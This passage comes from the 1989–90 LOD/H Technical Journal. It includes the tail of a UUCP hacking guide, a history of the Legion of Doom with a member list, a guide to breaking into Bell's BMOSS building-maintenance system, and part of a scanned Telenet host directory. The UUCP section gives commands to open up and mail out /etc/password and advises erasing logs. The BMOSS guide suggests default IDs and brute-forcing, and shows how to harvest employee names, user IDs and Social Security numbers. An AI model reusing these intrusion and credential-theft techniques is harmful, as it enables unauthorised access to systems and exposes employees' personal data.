               |  -j Display the UUCP job request number. This | 
               |     is useful if you're going to use uustat   | 
               |     to manipulate & reroute UUCP requests in  | 
               |     the queue.                                | 
               |                                               | 
               |  -m Notify sender by mail when copy is done.  | 
               |     Potentially hazardous, as incoming mail   | 
               |     is logged.  Later on I'll show how to     | 
               |     modify that log...                        | 
               |                                               | 
               |  -n<username> Notify the user specified on    | 
               |     the remote system when the xfer is done.  | 
               |     I assume everyone sees how foolish this   | 
               |     would be, right?                          | 
               |                                               | 
               |  -r Queue the job, but do not contact remote  | 
               |     system immediately.  Can't see any pros   | 
               |     or cons in using this one...              | 
               |                                               | 
               |  -s<filename> Pipe the UUCP status messages   | 
               |     to filename. Useful if you wish to log    | 
               |     off & then check the progress later.      | 
               |                                               | 
               DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 
 
     D. Executing Remote Commands 
 
     The uux program allows users to execute a program on another 
system on the network.  While in theory this is the most useful 
command a hacker can use, in practice it is usually heavily 
restricted- any system administrator with half a brain realizes 
that letting people execute any command they like from across the 
country is not the way to maintain system integrity. 
 
     There are, however, some useful things that can be done with 
uux even if the sysadmin has protected the things that *he* thinks 
are dangerous (remember, he's not a hacker, you are.  You are 
smarter, more persistent, and much cleverer than he is.  He doesn't 
like coming to work every day, can't wait to leave, and will do the 
minimum possible to get by.  You're different. You're dedicated & 
tricky.  You *like* what you're doing.  If you don't, get the hell 
out & let others who do take over.  End of the pep talk.) 
 
     The format for the uux command is: 
 
$uux [options] command-string. 
 
See Table 3 below for a list of options. 
 
     Ok, ideal case.  The System manager of Beta is an idiot who 
has left all possible commands open, and the uucico daemon has root 
privs.  Let's say you want to alter the protection of the password 
file, copy it into the D/ (public, remember?) directory, then copy 
it over to your system.  The sequence of commands would be: 
 
$uux Beta!chmod 777 /etc/password 
$uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt 
$uucp Beta!D/info.txt /usr/hacker/ 
 
     The first line would modify the protection where anyone could 
get to it, the second line would copy it into the D/ directory, and 
the third line would send it along to you. 
 
     Unfortunately, most commands are disabled (useful ones like 
chmod and cat and ls, at least.)  But sometimes you can get around 
that.  For instance, often you might not be able to ls or cp the 
password file.  But very rarely will mail be disabled.  So if you 
wanted a copy of the password file, you have them mail you one: 
 
$uux Beta!mail Alpha!hacker < /etc/password 
 
     Later in the UUCP Administration section, I'll explain how to 
modify the remote system so any command you want is executable. 
 
     When you execute a remote command, UUCP will automatically 
send you mail telling you how it went.  It's a good idea to check 
the logs and see if there's anything you need to remove to cover 
your presence (this subject will be covered in Part II). 
 
     If you are executing a command that is going to need data from 
a file, you specify that the file is on your local system by 
prefacing it with a X!.  I can't think of many reasons to use this, 
but perhaps you can.  As an example, let's say you wanted to print 
a file in your directory called 'stuff' out on a remote laser 
printer (bad hacking practice, and difficult to retrieve.) Do this: 
 
$uux Beta!lp -dlaser X!stuff 
 
     If the command you want to execute (whodo in this example) is 
forbidden, you will get a notification message similar to the 
following: 
 
>From uucp Sat Dec 24 23:12:15 EDT 1988 
>From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta 
Status: R0 
uuxqt cmd (whodo) status (DENIED) 
 
     If you are going to need the standard output for a command, 
pipe it into D/.  And any files or processes created by uux will 
belong to the user uucp, not to you. 
 
                                   Table 3 
                                   DDDDDDD 
        __________________________________________________________ 
        |                                                        | 
        |   -a<username>  Notify user username when completed.   | 
        |                                                        | 
        |   -b  Print the Standard Input when the exit status    | 
        |       indicates an error.                              | 
        |                                                        | 
        |   -c  Do not copy files to the spool directory (I      | 
        |       recommend this one...too big a chance of someone | 
        |       glancing in the spool dir.                       | 
        |                                                        | 
        |   -g<char or num> Sets the priority of the transfer.   | 
        |       The lower alphabetically or numerically that     | 
        |       the char or num is, the faster the process will  | 
        |       be executed.  i.e.  -ga or -g2 will go faster    | 
        |       than -gr or -g8.                                 | 
        |                                                        | 
        |   -j  Print the UUCP job number.  Useful if you're     | 
        |       going to be playing with the queue.              | 
        |                                                        | 
        |   -I  (BSD Only) Make a link from the original file to | 
        |       the spool dir.  I'm not sure what this is for.   | 
        |                                                        | 
        |   -L  (BSD Only) Start up the uucico daemon.           | 
        |                                                        | 
        |   -n  Don't notify by mail.  Recommended if you don't  | 
        |       have the authority or knowledge to modify the    | 
        |       system mail logs.                                | 
        |                                                        | 
        |   -p  Use Standard Input                               | 
        |                                                        | 
        |   -r  Queue the job but don't start uucico.            | 
        |                                                        | 
        |   -s<filename> Send transfer status to file filename.  | 
        |                                                        | 
        |   -x<0..9> Set level of debugging information.         | 
        |                                                        | 
        DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 
 
     E. uustat & uulog 
 
     These two programs are used to track UUCP jobs and examine 
their status. 
 
     uustat prints out a one-line summary for each job, telling you 
if the job is finished or the job is queued.  Older versions of 
uustat will have the job state as either JOB DELETED or JOB IS 
QUEUED.  The output of uustat will look like the following: 
 
$uustat 
 
   1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED 
   1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED 
    |      |     |        |           |             | 
    |      |     |        |           |             | 
  job #   user  node  start-time  status-time    job-status 
 
See Table 4 for a list of options for the uustat command. 
 
     uulog is a more thorough version of uustat, as it tracks the 
status messages logged by the system as your job proceeded through 
the system.  See Table 5 for options of the uulog command. 
 
                                  Table 4* 
                                  DDDDDDD 
            _________________________________________________ 
            |                                               | 
            |  -a  report all queued jobs.                  | 
            |                                               | 
            |  -k<job#> kill job # job#.                    | 
            |                                               | 
            |  -m  report if another system is accessible.  | 
            |                                               | 
            |  -q  report the number of jobs queued for     | 
            |      all systems on the net.                  | 
            |                                               | 
            |  -s<system> report the status of jobs for     | 
            |      the system named systemname.             | 
            |                                               | 
            |  -u<username> report the status of jobs for   | 
            |      user username.                           | 
            |                                               | 
            DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 
            * There are several other options such as -o and 
              -y that are system specific, and aren't really 
              that useful to begin with. 
 
 
                                  Table 5 
                                  DDDDDDD 
                        ______________________________ 
                        |                            | 
                        |  -s<system> same as uustat | 
                        |                            | 
                        |  -u<userid> same as uustat | 
                        |                            | 
                        DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 
 
****************************************************************** 
This marks the end of Part I.  If time permits a Part II will be in 
the next LOD/H Technical Journal. 
 
(c) 1989   The Mentor 
           Legion of Doom/Legion of Hackers 
 
****************************************************************** 
 
 
The LOD/H Technical Journal, Issue #4: File 06 of 10. 
 
 
                            The History of LOD/H 
                            Revision #3 May 1990 
                            written by Lex Luthor 
 
 
NOTES: I approximated all dates, as my records are not totally complete. 
       If I left anyone out or put someone in that shouldn't be in, sorry I 
       tried and did spend considerable time researching the dates and 
       BBS files, the old LOD BBS software, etc. Revisions one and two were 
       released to LOD/H members only. Some information may only be relevant 
       to those who were around at the time. 
 
 
   The primary purpose of this article is simply to present an accurate 
picture of events and people who have been associated with this group. The 
reputation of many groups and many people have been tainted by slanderous 
remarks made by uninformed law enforcement and justice department personnel, 
the media, and other hackers. I find this sad, but it's a fact of life that 
must be endured. All that can be done in this article is to attempt to present 
the facts as I see them. Due to the wild and unfounded accusations by said 
persons, today LOD is viewed more as malicious criminals than as for what it 
was viewed as in the past. That is, of a group of people who put themselves at 
risk to help inform others. Of course this is a prettier picture than most 
want to believe, and is slightly prettier than what it is in actuality, but 
the ideal is there. Whenever a group of individuals get together, you cannot 
forget that they are individuals. These individuals can and do make mistakes 
in judgement in some cases. But also, they have been and continue to be 
victimized by law enforcement and said others. Over the years I have collected 
tens of newspaper and magazine articles about "The LOD", myself, and others 
with not a one being perfectly accurate. You have heard it before: don't 
believe everything you read. That goes for this article also, although I have 
made an honest attempt at ensuring that it is truthful and accurate, as Ripley 
said: believe it, or not. 
 
   I have been "retired" for quite some time now. My definition of retired is 
simply that of keeping my activities to those of a strictly legitimate nature. 
It is quite funny yet pitiful to here people say, "once a crook always a 
crook" AND BELIEVE IT! That statement is a fallacy. Nearly everyone has done 
something wrong when they were young yet many grow up to become the so called 
normal, law abiding citizens that society says we should be. At this point in 
time and in the foreseeable future, the risks of exploring and learning about 
telephone and computer networks in a less than legitimate fashion outweigh the 
benefits. I think many of the older hackers have adopted this philosophy out 
of necessity. This decision is even easier after reflecting on the events of 
which I have seen during the course of my "career". Those events are primarily 
those of seeing people's rights being violated by law enforcement. Their 
privacy being forsaken by the media. I do not dispute however, that some 
hackers have done these same things to other hackers and other people. Neither 
side is right or fair so I suppose it is time to exit since it's getting too 
hot in the kitchen. I will remain however, in an advisory capacity to the 
Technical Journal and group for as long as they continue exist. If you are to 
believe the rumors, LOD has been dead many times, again untrue. The main 
drawback of becoming a BBS hermit is how the rumors start to accrue as time 
progresses. I have been "busted" perhaps a hundred times if you believe every 
rumor. The fact is that I have never been visited let alone busted. I have 
seen many people get into trouble due to their own carelessness. Those who 
have remained unmolested by the authorities are either very careful and 
paranoid, or are helping them catch others. I have been extremely careful and 
exceedingly paranoid, period. 
 
   Now that I have harassed the reader with my comments regarding the whole 
hacking/phreaking experience, I present the story. Please note that I realize 
many people could care less about all this, and if you are in that category 
you can always throw this into the shredder, now. But, there is a sufficient 
number of people who actually are curious to get the real story on this stuff 
so here it is, presented to correct the many inaccuracies which have surfaced 
over the years and also for the sake of posterity. 
 
_____________________________________________________________________________ 
 
   During the winter break from school in late 1983, I took a trip up to Long 
Island, NY to visit Quasi Moto. I had met him in south Florida, and he had 
since moved. He decided to put up a BBS, and while visiting him, we worked on 
it. For those who do not remember, its name was PLOVERNET. PLOVERNET was 
considered a resurrected OSUNY by some since some users migrated to PLOVERNET 
after OSUNY went down, at least in part, by an article in Newsweek mentioning 
it. A new hacker magazine, 2600, started posting advertisements on various 
boards. I had been in contact with Emmanuel Goldstein, the editor of 2600, on 
Pirates Cove, another 516 BBS. I gave him the number to PLOVERNET and due to 
the large amount of users, (500, of which 70% were relatively active) 2600 had 
plenty of response. PLOVERNET went online in January of 1984 and shortly 
thereafter it was the busiest BBS around. It was so busy in fact, that a long 
distance service called LDX had stopped connecting people who dialed 
516-935-2481 which was PLOVERNET's number. Now remember, this is early 1984 
here. The practice of blocking calls to a certain number wasn't really done 
by common carriers until 1986/87 with the emergence of new security software 
and audit trail information. I picked the best phreaks and hackers from 
PLOVERNET and invited them onto the newly created LOD BBS. LOD was one of the 
first boards which upon connection did nothing until you entered the primary 
password, and there was no new user routine as the board was invitation only. 
Again, this was back in early 1984. It was a fairly original albeit paranoid 
practice at the time, and many boards subsequently adopted the technique as 
security became an increasing concern. 
 
   Various groups had started forming such as Fargo 4A and Knights of Shadow. 
I was admitted into Knights of Shadow in early 84. After suggesting some 
promising new phreaks/hacks for membership and being turned down because they 
were not well known enough, (ie: they weren't big names even though they knew 
more than the guys who supposedly were) I put up the Legion Of Doom! bulletin 
board and shortly thereafter started a phreak/hack group of the same name. 
This was about May of 84 from what my records show. I had been a member of 
KOS and LOD or a brief time and then KOS broke up. Although there were many 
users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction 
seems to have been forgotten by many, since some who were on the BBS have 
claimed to have been in the group, which is not true. 
 
   The name Legion Of Doom! obviously came from the cartoon series which 
pitted them against The Superfriends. I suppose other group names have 
come from stranger sources. My handle, Lex Luthor was taken from the 
movie Superman I. In the cartoon series, LOD is led by Lex Luthor and 
thus, the group name was rather fitting. Being young and naive, I thought 
having a handle of someone who claimed to have 'the greatest criminal mind on 
Earth' and leading a group of the world's most notorious criminals would be 
cool. That was about 7-8 years ago. Now however, I see that there is nothing 
cool or attractive about being a criminal (believe it, or not). 
 
   The original group consisted of phreaks who I had thought were very good 
but were not considered 'famous' like those in KOS. Those original members 
later became some of the best known phreak personalities and contributed 
substantially to the knowledge of new and old phreaks alike. A list of members 
from the very beginning to the present follows. Through my records and from 
the best of my recollection I have approximated dates of entrance and exit and 
other information. Also, I believe I have a complete list however, there 
could be a mistake or two. Very few if any, handles from the past have been 
duplicated by 'impostors' whether knowingly or unknowingly. 
 
   I look at this article as a historical document seeing how no other group 
has survived as long as LOD has. LOD originally consisted mainly of phreaks, 
but had split into two separate entities.  LOD for telecommunications 
hobbyists, and LOH for hacking and security enthusiasts. 
 
Handle                 Entered   Exit      Location   Reason for leaving 
----------------------------------------------------------------------------- 
Lex Luthor             early 84  CURRENT   Here/There  ---CURRENT MEMBER--- 
Karl Marx              early 84  late  85  Colorado    Went underground/quit. 
Mark Tabas             early 84  late  85  Colorado    Many reasons. 
Agrajag The Prolonged  early 84  late  85  California  Loss of interest. 
King Blotto            early 84  late  85  Ohio        No time/college. 
Blue Archer            early 84  Fall  87  Texas       College. 
The Dragyn             early 84  late  86  Minnesota   No time/lost interest. 
 
Unknown Soldier        mid   84  early 85  Florida     Busted- Toll fraud. 
Sharp Razor            late  84  early 86  New Jersey  Busted- Abusing CIS. 
Doctor Who             late  84  early 86  Mass.       Misc.  Trouble 
Erik Bloodaxe          late  84  CURRENT   Here/There  ---CURRENT MEMBER--- 
Sir Francis Drake      late  84  early 86  California  ??? 
Paul Muad'dib          late  84  early 86  New York    Went underground/quit. 
Phucked Agent 04       late  84  late  87  California  No time. School. 
X-man                  late  84  mid   85  New York    Busted- Blue boxing. 
Randy Smith            late  84  mid   85  Texas       ??? 
 
Steve Dahl             early 85  early 86  Illinois    Busted-Carding. 
The Warlock            early 85  early 86  Florida     Lost interest. 
Terminal Man           early 85  late  85  Mass.  Kicked out-malicious hacking 
 
Silver Spy             late  86  Fall  87  Mass.       College. 
The Videosmith         early 86  Fall  87  Penn.       Lost interest. 
Kerrang Khan           early 86  Fall  87  U.K.        ??? 
The Marauder           early 86  mid   88  Conn.       Lost interest. 
Gary Seven             early 86  mid   88  Florida     Lost interest. 
Bill From RNOC         early 87  late  87  New York    Misc.  Trouble. 
 
Carrier Culprit        mid   87  mid   88  Penn.       Lost interest. 
Master of Impact       mid   87  mid   88  California  School. 
The Leftist            mid   87  Sum   89  Georgia     Misc.  Trouble. 
Phantom Phreaker       mid   87  Fall  89  Here/There  Lost interest. 
Doom Prophet           mid   87  Fall  89  Here/There  Lost interest. 
 
Thomas Covenant        early 88  early 89  New York    Misc.  Trouble. 
The Mentor             mid   88  Sum   89  Here/There  Lost interest. 
The Urvile             mid   88  Sum   89  Georgia     Misc.  Trouble. 
Phase Jitter           mid   88  CURRENT   Here/There  ---CURRENT MEMBER--- 
Prime Suspect          mid   88  CURRENT   Here/There  ---CURRENT MEMBER--- 
The Prophet            late  88  Sum   89  Georgia     Misc.  Trouble. 
Skinny Puppy           late  88  CURRENT   Here/There  ---CURRENT MEMBER---- 
Professor Falken       late  89  CURRENT   Here/There  ---CURRENT MEMBER--- 
 
 
Directory key: 
"Lost Interest": simply means they lost interest in phreaking/hacking in 
general, not lost interest in LOD/H. 
"???":  reason for leaving is unknown. 
Misc. Trouble: Exactly that. Too much to go into here. 
Of all 38 members, only one was forcefully ejected. It was found out that 
Terminal Man destroyed data that was not related to covering his tracks. This 
has always been unacceptable to us, regardless of what the media and law 
enforcement tries to get you to think. 
Remember, people's entrance/exit times have been estimated. 
 
 
                               [ End of Article ] 
The LOD/H Technical Journal, Issue #4: File 07 of 10 
 
                     The Trasher's Handbook to B.M.O.S.S. 
                                     by 
                            Spherical  Aberration 
 
INTRODUCTION: 
 
   Those who have actually trashed at Bell Co. before know that finding an 
installation can be a pain.  Most Telco buildings these days are un-marked, 
plain, and generally overlooked by the average person.  The buildings 
were specifically made so that they WOULD be overlooked, concealing 
itself and its contents.  Knowing where all Bell Co. installations are 
would be nice, and through the help of BMOSS we can find out where they 
ALL are. 
 
NOTE: It is possible to get locations from your city hall, just take a 
look at what property Bell Co. owns and locate it.  However, there are few 
catches to this method.  First, most cities charge you to find out who 
owns what property and there might be a waiting period of a few days. 
Second, not all Bell Co. property is owned by Bell Co.  There are 
instances of Bell Co. renting a piece of property from a company and 
using the existing building, possibly with the leasing companies logo 
still on it. 
 
   BMOSS stands for Building Maintenance Operations Service System. 
BMOSS provides computer support for daily building maintenance tasks. 
A comprehensive database helps users keep track of repair activities. 
Telco field mechanics logon everyday to do assorted field mechanic 
stuff.  From BMOSS they can check on tasks needed to be done, send 
messages to users, charge various Telco installations for work, log time 
sheets, generate purchase orders, see where his buddies are eating lunch etc. 
 
   BMOSSes are usually located in a BOCC (Building Operations Control 
Center) or in a REOC (Real Estate Operations Center).  BMOSS is run 
under AT&T Unix System V and at some points is quite Unix-like.  At each 
center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of 
operations for that center and other installations supported by that 
BOCC/REOC. 
 
LOGGING ONTO BMOSS: 
 
   Before logging on to BMOSS you must select the proper type of 
terminal emulation.  BMOSS has 4 types of emulations available for all 
users.  Users within the BOCC/REOC use either VT100 or VT220 compatible 
terminals, while other internal stations will use an LA120 printer 
terminal.  Field Mechanics at a remote location use their typewriter 
like LA12 printer terminals. 
 
   Identifying a BMOSS dialup is not that hard at all.  After hitting a 
three [CR]'s the system will respond with something like this: 
 
   (BEEP!) 
 
   Good Morning   (Depending on what time of day it is) 
 
   BASE/OE - Fri 04/23/90 09:43:22 - Online 9 
 
   User ID? 
   Password? 
 
   Typically user IDs are the three initials of the field mechanics name. 
After inputting your ID you will be prompted with a Password? request. 
Passwords can be from 6 to 8 characters in length, including punctuation 
marks, the first letter must begin with an alphabet-letter or a number. 
They cannot contain spaces or the users first/middle/last name. 
Periodically the system will prompt the user for a new password.  This 
period of time is usually set by the system administrator. 
 
   I have found that the "WRK:A10" user ID or a variation of WRK:xxx 
where xxx is a alpha-numerical combination has worked excellent for me. 
I believe the WRK:xxx is some type of low-level account when field 
mechanics lose their current ID/PW combination.  Initials also have been 
found on most of the systems, so a WRK:xxx and Initials brute-force attempt 
just may give you a working ID. 
 
 
IN BMOSS: 
 
   Once penetrating initial security you are then prompted with BMOSS's 
FLD> main level identifier.  This FLD> changes as you move from BMOSS's 
root to the various main BMOSS branches. 
 
   Sometimes when you logon to BMOSS you will receive a memo saying, 
"NOTE - Check your office" at this time go to the Office and read the memos 
sent to you.  Read THE OFFICE later in this article to learn how. 
 
   BMOSS was designed with the average Joe in mind and is very logically 
laid out.  BMOSS was modeled after UNIX's Tree-oriented structure. 
Here is a Tree of BMOSS's structure: 
 
                                BMOSS 
                     _____________|_____________ 
                     |    |    |     |    |    | 
                    CON  DAT  ACT   FOR  BIL  OFF 
 
Main Branches: 
CON- Control Functions (Sys Admin payroll/timesheet functions) 
DAT- Database Maintenance (What we are mainly concerned with) 
ACT- Field Activity (Handles field activities) 
FOR- Force Administration (Recording labor hrs for time sheets etc.) 
BIL- Bill Paying (Processing purchase orders, producing expense accts.) 
OFF- Electronic Office (Receive/Send Messages or Page users) 
 
   Each main branch then branches off into its own specific 
commands.  I will concentrate on the Database Maintenance functions since 
the other functions have little or no use to us. 
 
DATABASE MAINTENANCE: 
 
   To haul in the mother lode you go into the Database Maintenance area 
from the root.  This is accomplished by typing DAT in at the FLD> 
prompt.  Now you should get a DAT> prompt meaning you are now in the 
Database Maintenance section.  To get a listing of the available DAT 
commands type in 'SHO' which is short for SHOW.  We are mainly concerned 
with the BLD (Building Master) function.  Once the BLD function is 
selected you will be prompted for a sub-form. There are 7 sub-forms for 
the BLD function. 
 
   BLD Sub-Forms: 
1. GEN- General Background 
2. OWN- Building Ownership (used for adding a new building to database) 
3. LES- Lease Terms (used for adding a new building to database) 
4. EMG- Emergency Data (contains Police and Fire Dept. that serve this 
        location and their respective telephone numbers, and whether the 
        location has backup power and fire-sprinklers etc.) 
5. RES- Maintenance Responsibility (Maintenance entries for building) 
6. WRD- Building Warden (Building Wardens number etc.) 
7. NOT- General Notes (Notes about the particular building) 
8. ACC- Accounting Distribution (Account for particular building) 
 
Accessing the above information is as easy as selection of the three 
letter identifier at the Sub-Form prompt.  We are particularly concerned 
with the GEN (General Background) information.  This function gives us the 
following data: 
 
 1. Building's Number 
 2. Building's Complete Address 
 3. Building's Name 
 4. Building's Sector (Bell informational purposes only) 
 5. Building's Zone   (Bell informational purposes only) 
 6. Whether or not Bell owns the building. (A Y/N combination is usually 
    shown here.  Y meaning its is owned by Bellco, N meaning its not 
    owned by Bellco.) 
 7. The building's group (One letter identifier) 
 8. The building's use.  (Garage/Warehouse/Office etc.) 
 9. The kind of telephone equipment used in the building. (ESS1A etc.) 
10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier) 
11. The number of floors in the building 
12. The number of basements in the building (A number of 3 here would 
    mean the building has 3 below ground level floors. 
13. Whether or not the building has a cable vault. (Y/N identifier) 
14. Gross Square footage of the building 
15. The number of reserved parking spaces for the building. 
 
   Once entering the DAT section and entering GEN as your sub-form 
selection you will be prompted for a building number.  Random selection 
of building numbers is necesbsary because they vary from area to area. 
Once a legitimate building number is accessed the above information will 
be displayed. 
 
   Ok, you now have the information you need, how do you get back to a 
previous directory or even log off ? That's quite easy.  Typing in EXI 
(short for EXIT) will bring you back up to the root FLD> one directory at 
a time.  For logging off the system you should hit EXI until you reach the 
FLD> root then BYE and you will get: 
 
   BASE/OE - Fri 4/23/90 10:22:13 - Offline 9 
 
   Have a Good Morning 
 
OTHER FUNCTIONS: 
 
   I have found the REPORTS function most helpful in finding other 
user IDs.  To get a listing of the 20+ different types reports type 
'HELP REPORT' at the FLD> prompt.  We are particularly concerned with 
REPORT 41, the Estimated vs. Actual Hours Log.  We bring this up by 
typing from the FLD: 
 
FLD> REPORT 41 04/02/90-04/06/90  <cr> 
 
   You are inquiring for the estimated vs. actual hours time on a series 
of jobs from April 4th 1990 through April 6th 1990.  The output then 
kicks out the hours and such.  Every field mechanic that worked throughout 
those days will be displayed in- First name, Middle Initial, and Last Name 
totally spelled out for you. 
 
   Another useful report is REPORT 90- Data Access Log.  It is called up 
by typing: 
 
FLD> REPORT 90 <cr> 
Date Range? 04/06/90-04/08/90 
 
   The system then kicks out all users that used the SCOPE command on 
other users.  The system prints out the users full name and actual USER ID 
and who the user scoped including the scoped-user's Social Security number. 
 
THE OFFICE: 
 
   When you are prompted that you should check your messages you should 
do so immediately before any work is done in BMOSS.  First you must go to 
your office which is done by selecting OFF from the FLD> identifier. 
Once this is done your FLD> prompt will change to a OFF> prompt.  Typing 
HELP will give you the available HELP commands for the office. 
 
   To check the messages type in: 
 
   OFF> STATUS <cr> 
 
   BMOSS will reply with the following: (example) 
 
       Memo            From User              Subject          Status 
   --------------  ------------------  ----------------------   --- 
   IPAAA 04/01/90  Wile E Coyote       Current Task Info        OUT 
   BNAAA 04/02/90  Susie B Hott        Last Saturday Night      IN 
 
   The user then sees he has a memo from his boss about his current 
tasks and a memo from his co-worker/seductress Susie B. Hott.  Fuck his 
boss, he wants to read what Susie has to say.  So you type in: 
 
   OFF> PRINT BNAAA <cr> 
 
 
                              --- MEMO --- 
   Date: 04/02/90 
   Time: 08:11 
 
   From: Susie B Hott 
   To: Legion Of Doom 
 
   Subject: Last Saturday Night 
 
   LOD, I really enjoyed last saturday night.  We must do it again. 
   Give me a call soon, 555-WETT. 
   ** Susie 
 
 
   A useful command is a list of OFFICE users.  This gives you another 
   listing of user's Full-Name/ID combinations.  Get this by typing: 
 
   OFF> USERS <cr> 
 
   It will then print out the users who are in the Electronic Office 
   database. 
 
   CONCLUSION: 
 
   You can get HELP from anywhere just by typing HELP from the prompt. 
Or if you need specific information about a function type in HELP then 
the function name. Such as: 
 
   FLD> HELP REPORT  (This gives you options/help on the REPORT command) 
 
   BMOSS can be used for a large amount of purposes for the 
hacker/trasher.  Even though it doesn't have any really powerful 
commands to self-destruct the telephone company it can be used to access 
other building's trash, and other things that may interest you. 
 
   ______________________ 
  ( Spherical Aberration ) 
The LOD/H Technical Journal, Issue #4: File #08 of 10 
 
                       The Legion Of Hackers Present: 
                       Updated:  Telenet Directory 
                       Part A: Addresses 201XXX to 424XXX 
                       Revision #5 Last Updated: 2/10/90 
                       (Includes Mnemonic Host Names) 
 
                           Scanned and Written by: 
                                Erik Bloodaxe 
 
INTRODUCTION: 
------------- 
 
It has been some time since our last update. Our old list (Revision #4) has 
been distributed to those in the United States and internationally thanks to 
the widespread use of the PSS network. For this reason we are including the 
format for converting this 'local' address list into accessible hosts using 
the standard scheme for telenet when accessed from 'foreign' networks. 
 
For example, the local address: 20114 is 031102010001400 using the standard 
format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet 
and the zero preceding it is needed to make it clear to the foreign 
network that the NUA (Network User Address) is a non-local address. Another 
example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA 
00 XXX YY NPA is the area-code prefix (this is not necessarily an area code), 
XXX is the sub-address and YY is the port which is usually 00. 
For those unfamiliar with Telenet addressing, it generally follows the format 
of grouping hosts into area codes. Thus, our directory is grouped accordingly. 
There are 'non-standard' address prefixes which are rather obscure. These 
commonly are owned by the same company or organization, whereas the area code 
format contains hosts from many companies or organizations. The state an area 
code resides is also listed to give you an idea of its location. 
I have also included Telenet commands, mnemonic addresses, a somewhat current 
list of pc-pursuit dialers, and a few things to consider for the would-be 
Telenet scanner. 
 
NOTES: 
 
When accessing telenet from abroad, ignore the '$' after the address. This 
denotes to users of the USA that an NUI (Network User ID) is required due to 
the host not accepting collect charges for the connection. 
 
Addresses preceded by a * refuse collect connections, but I was 
unable to connect with them to determine what they were. 
 
Addresses that have no comments next to them either hang up upon connection, 
or I was unable to evoke any response from them. 
 
Due to its immense size, this directory has been presented in a 'rougher' form 
than our previous ones. The time to make it look 'pretty' was determined to 
not be worth the effort. 
 
 
TELENET COMMANDS 
---------------- 
 
Most commands are listed in their four character form, however, 
some may be abbreviated to merely one character (ie. C & D). 
 
CONN            Allows user to connect to a specified host 
DISA ECHO 
DISA FLOW 
DISA TFLO 
DISC            Disconnect from current host 
DTAPE           ? 
ENAB ECHO 
ENAB FLOW 
ENAB TFLO 
FULL            Full duplex 
HANG            Hang up port 
HALF            Half duplex 
MAIL            Telemail service 
PAR             Set parameters as specified 
PAR?            Shows current parameter settings 
RESE            Resets the node to inactive 
RST             Sets parameters of remote host as specified 
RST?            Shows current parameters of remote host 
SET             Same as PAR 
SET?            Same as PAR? 
STAT            Shows current port 
TAPE            ? 
TELE            Telemail service 
TEST CHAR       Test of all ascii characters 
TEST ECHO       Test which echos all characters typed 
TEST TRIA       Test which makes repeating triangle 
TEST VERS       Shows current pad software version 
 
The default command is CONN, so if an address is entered at the 
'@' prompt, an attempt will be made to connect to that address. 
 
A connection attempt may be aborted by sending a break signal. 
This will put you back to the '@' prompt. 
 
To return to the '@' prompt from an established connection the 
user must type '@' followed by carriage return. 
 
Normal 300/1200 users awaken the pad with two carriage returns. 
2400 baud users must type '@' then carriage return. 
 
To awaken the pad in the Uninet format, type:  carriage return, 
period, then carriage return (upon initial connection). 
 
To find the telenet dialup nearest your location, call 800-424- 
9494 at 300/1200 baud.  At the '@' prompt, type 'MAIL'.  Enter 
user name 'PHONES' with password 'PHONES'. 
 
 
TELENET DIRECTORY 
----------------- 
 
201--NEW JERSEY--ADDRESSES SCANNED:  0-2000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  1                      PC Pursuit Dialer (1200) 
   14                     WELCOME,  NAME OR #? 
   15                       "           " 
$  20      VM/370 
$  22                     PC Pursuit Dialer (2400) 
*  23 
   25                     WELCOME, NAME OR #? 
   32                     D&B 
$  34      PRIME          MWH 
$  35      PRIME 
   45                     NEWSNET 
$  49      VAX 
   50      UNIX           Interet 
$  51      PRIME          USCGB 
   53                     Colgates IICS 
$  55      PRIME          USCGB 
$  66      PRIME          SYS001 
   67                     Warner Computer Systems 
   68                       "           " 
   69                       "           " 
   74                     enter class 
   83                     ENTER ID: 
   84                     D&B 
   86                     D&B 
   88                     D&B 
   89      VM/370 
$  129a 
   138     HP-3000 
*  140 
   146     HP-3000 
   149     VAX 
*  150 
   156     UNIX           Securities Data Company 
   159a 
   163                    VU/TEXT 
   164                    VU/TEXT 
   166     VM/370         New Jersey Educational Net 
   171                    >> 
   172                    >> 
   173 
   200                    D&B 
   201                    D&B 
   220     VAX            Investment Technologies 
   225     VAX              "              " 
$  241 
   242                    D&B 
   243                    D&B 
   244                    D&B 
   246                    D&B 
   249                    password required 
*  251 
   252     PRIME 
   259     VAX            CCMI/McGraw Hill 
*  260 
$  301                    PC Pursuit Dialer (1200) 
   334                    TINTON1 
*  336 
$  350                    Concurrent Computer Corp 
   353                    enter switch characters 
$  355                    Concurrent Computer Corp 
   359                    Telenet Async to 3270 
   367 
*  371 
*  379 
   453                    Telenet Async to 3270 
   454a                   Telenet Async to 3270 
$  458                    ENTER REQUEST 
$  459                         " 
   461     VAX 
   463a                   Telenet Async to 3270 
   470     Decserver 
$  472                    MHP201A 
   476                    X.29 Password: 
   477                    Please enter logon cmd 
$  478                    MHP205A 
   479                    Please enter logon cmd 
   520                    Enter Access ID: 
   521                    Bankers Trust Online 
   522     VAX            NYBTRP 
*  548 
   586                    Dow Jones News Retrieval 
   587                      "            " 
   589                      "            " 
   604                    Lipton Network 
   700     HP-3000 
   702     TOPS-20        CEI 
   722                    INSCI/90 
   730                       " 
   751                       " 
   752                       " 
   770                       " 
   792                       " 
   799 
   830                    INSCI/90 
   841                       " 
   850 
   870                    INSCI/90 
   890                       " 
   895                       " 
   899 
   910                    INSCI/90 
   912                       " 
   914                       " 
   916 
   918                    INSCI/90 
   940                       " 
   950                    Bankers Trust Online 
   951                      "         " 
   952                      "         " 
   953                      "         " 
   954                      "         " 
   955                      "         " 
   956                      "         " 
   957                      "         " 
   958                      "         " 
   959                      "         " 
   999 
   1025 
   1051                   VU/TEXT 
   1052                      " 
